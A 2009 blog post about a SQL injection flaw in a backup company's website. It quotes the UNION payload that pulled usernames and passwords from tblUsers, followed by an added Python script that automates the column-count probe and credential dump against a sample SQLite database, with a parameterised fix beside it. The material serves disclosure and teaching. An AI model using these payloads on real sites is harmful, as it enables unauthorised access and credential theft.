Friday, May 22, 2009

'secure backup'

Recently my company decided to become a reseller for a backup company. This company installs a program on someone's computer and uploads data using an SSL link. Pretty cool, you'd say, if it wasn't for the fact that their website is a leaking basket running mssql...

I'm not very fond of mssql... it's too dangerous. Forgetting one cast or escape and you're screwed. People can simply drop your database table by table.

Anyway, the fun part is that this company is telling people that there's nothing more safe than their backup tool. That might be true; however, considering their website, I very much doubt it. Thank God they didn't develop their website on their own.

In two days we'll be contacting them about this security issue. We might benefit from this mistake! ;)

Oh, the injection was a simple one:

Microsoft JET Database Engine error '80040e14'

The number of columns in the two selected tables or queries of a union query do not match.

,1,1,1,1, etc., and eventually:

-1 union all select 1,2,3,4,password,username,7,8,9,10,11,12,13,14,15,16,17 from tblUsers #

gave me everything I needed to know for a solid proof of concept ;)
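As an added example (not code from the original post or from the backup company's site), here is the same two-step attack reproduced against a constructed in-memory SQLite database, beside the parameterised query that defeats it: first the UNION column-count probe that produced the "columns ... do not match" error above, then the UNION that swaps password and username into two of the placeholders. The table names tblNews and tblUsers, their columns, the sample rows and the function names are assumptions; SQLite's column-mismatch error stands in for the JET one quoted above, and no trailing comment marker is needed here because the injection point sits at the end of the statement.

```python
import sqlite3


def build_db():
    """Constructed sample schema, not the site from the post: one public table the
    page queries, plus a tblUsers table that the UNION reaches."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblNews (id INTEGER, title TEXT, body TEXT)")
    conn.execute("INSERT INTO tblNews VALUES (1, 'Welcome', 'First post')")
    conn.execute("CREATE TABLE tblUsers (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO tblUsers VALUES (1, 'admin', 'hunter2')")
    return conn


def news_vulnerable(conn, item_id):
    """The pattern the post describes: the request parameter is pasted into the SQL."""
    sql = f"SELECT id, title, body FROM tblNews WHERE id = {item_id}"
    return conn.execute(sql).fetchall()


def news_safe(conn, item_id):
    """Hardened version: the value is bound as a parameter and can never become SQL."""
    sql = "SELECT id, title, body FROM tblNews WHERE id = ?"
    return conn.execute(sql, (item_id,)).fetchall()


def find_column_count(query_fn, max_cols=20):
    """Step 1: append 'UNION ALL SELECT 1', then '1,2', ... until the column counts
    match. Success is recognised by the probe row coming back, not merely by the
    absence of an error, so a parameterised endpoint yields None."""
    for n in range(1, max_cols + 1):
        probe = tuple(range(1, n + 1))
        cols = ",".join(str(i) for i in probe)
        try:
            rows = query_fn(f"-1 UNION ALL SELECT {cols}")
        except sqlite3.OperationalError as exc:
            # SQLite's equivalent of the JET "number of columns ... do not match" error
            if "number of result columns" in str(exc):
                continue
            raise
        if probe in rows:
            return n
    return None


def dump_users(query_fn, ncols):
    """Step 2: substitute password and username for two of the numeric placeholders
    and point the UNION at tblUsers. Returns (username, password) pairs."""
    cols = ["1"] * ncols
    cols[0], cols[1] = "password", "username"
    rows = query_fn(f"-1 UNION ALL SELECT {','.join(cols)} FROM tblUsers")
    # id = -1 matches nothing in tblNews, so every row returned came from the UNION
    return [(row[1], row[0]) for row in rows]


def demo():
    """Run both steps against the vulnerable endpoint, then the probe against the
    safe one. Returns (column count, leaked credentials, column count via safe)."""
    conn = build_db()
    n = find_column_count(lambda p: news_vulnerable(conn, p))
    leaked = dump_users(lambda p: news_vulnerable(conn, p), n) if n else []
    n_safe = find_column_count(lambda p: news_safe(conn, p))
    return n, leaked, n_safe


if __name__ == "__main__":
    print(demo())
```

The probe stops when the database accepts the UNION and echoes the placeholder row; the post's ",1,1,1,1 etc." is exactly this loop done by hand. Against news_safe the same strings are bound as a single value compared to the integer id column, so neither the error nor the probe row ever appears.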


Cheers.